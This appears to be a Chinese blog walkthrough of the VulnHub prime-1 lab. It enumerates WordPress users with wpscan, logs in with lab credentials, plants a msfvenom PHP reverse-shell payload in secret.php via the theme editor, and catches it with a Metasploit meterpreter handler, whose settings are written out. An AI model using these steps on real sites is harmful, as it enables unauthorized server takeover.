news 2026/1/19 6:38:40

kali反弹连接wordpress靶场详细教程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
kali反弹连接wordpress靶场详细教程

前言

本次实战通过prime靶场进行操作,从寻找测试点和getshell,对各项步骤进行详细记录,以方便参考

接上一篇文章https://blog.csdn.net/qq_66136699/article/details/155752517?fromshare=blogdetail&sharetype=blogdetail&sharerId=155752517&sharerefer=PC&sharesource=qq_66136699&sharefrom=from_link

目录

一、反弹连接是什么?

二、使用步骤

1.准备工作

2.实战操作

①登录网站

②指纹识别

③尝试登录​编辑

④寻找上传点

⑥构建shell代码

⑦创建监听通道

⑧反弹shell

总结


一、反弹连接是什么?

简单来说就是黑客控制了目标,并建立了监听的端口,以及构建了一个可以访问的后门,这里的反弹连接是在通过在后台服务端上传木马,当客户端访问带有木马的页面时,攻击机通过监听的端口获取到了系统的shell,获得了执行命令的权限

二、使用步骤

1.准备工作

使用靶场:vulnhub-prime-1

攻击机版本:kali2025.03、

在前面的信息收集环节我们获取到了靶场 wordpress 的账号和密码

url:http://192.168.12.134/wordpress/

密码:follow_the_ippsec

2.实战操作

①登录网站

访问 wordpress 后台的url,并找到 login in 关键词

点击进去发现是一个登录页面

②指纹识别

回到 kali 攻击机对网站做一个指纹识别

wpscan --url http://192.168.12.134/wordpress/ --enumerate u

参数说明:--url 指定识别的网站地址,-enumerate u: 枚举用户名

结果显示发现了一个已注册的用户名

目前掌握的重要信息

账户:victor

密码:follow_the_ippsec

③尝试登录

登录成功!!

④寻找上传点

wordpress有一个功能,可以在系统内部编辑代码,思路是找到其中可以编辑的代码框,并上传带有反弹shell木马的代码,位置以标出

我找到的可编辑文件是 secret.php,

⑥构建shell代码

回到kali,利用 msfvenom构建php反弹连接的代码

输入这一串指令,我的 kali ip地址为:192.168.12.128

构建成功后cat查看代码并复制,开头的 / *就不用了复制了

粘贴到 wordpress 中 secret.php,并上传更新

⑦创建监听通道

回到kali,需要设置一些参数来建立监听连接

msfconsole

使用 msf 控制终端

输入以下参数,确保与 msfvenom 构建的反弹shell的文件参数一致

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.12.128

set lport 7777

⑧反弹shell

exploit 开始监听端口,并等待反弹shell

根据wordpress的项目目录结构,可以确定 secret.php 文件在下面这个位置

为方便学习最好自己搞一套wordpress的源码研究

回车!!再回到 kali 反弹连接 shell 成功。

可以再上面输入一些简单命令,也就是说初步获取到了靶机执行命令权限


总结

本文简单介绍了反弹shell进行连接的使用,使用了msf工具构建了带有木马的shell代码,经过一层层得到信息收集和测试,最终获取到了服务端shell执行命令的权限。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/1/18 3:48:36

V型翅片与六边形蜂窝翅片的散热性能差异

🎓作者简介:科技自媒体优质创作者 🌐个人主页:莱歌数字-CSDN博客 💌公众号:莱歌数字 📱个人微信:yanshanYH 211、985硕士,职场15年 从事结构设计、热设计、售前、产品设…

作者头像 李华
网站建设 2026/1/17 18:43:46

以太网温湿度传感器五重告警方式如何协同工作?

五重告警机制在以太网温湿度传感器中并非孤立运行,而是通过分层响应、多端触达、智能联动的方式协同工作,形成一套高效、可靠、全覆盖的环境风险预警体系。以下是其具体协同逻辑:1. 本地声光报警 —— 第一时间现场警示当温湿度超出设定阈值或…

作者头像 李华
网站建设 2026/1/17 15:54:58

COMSOL介电金属多层膜结构宽谱吸收器:文献复现与吸收特性研究

COMSOL介电金属多层膜结构宽谱吸收器。 该模型为文献复现,研究宽谱和窄谱吸收最近在研究COMSOL介电金属多层膜结构宽谱吸收器,这可是个很有意思的课题。先来说说这个模型,它是基于文献复现的,主要目的是研究宽谱和窄谱吸收情况。 …

作者头像 李华
网站建设 2025/12/31 17:19:54

使用DeepSeek开发第一个RAG

学习目标: 了解DeepSeek API开发平台,学习如何使用API开发应用。搞懂什么是向量数据库,为什么RAG需要它。掌握RAG(检索增强生成)的基本原理和关键技术要点。最后,实现一个基于DeepSeek和RAG搭建的智能问答…

作者头像 李华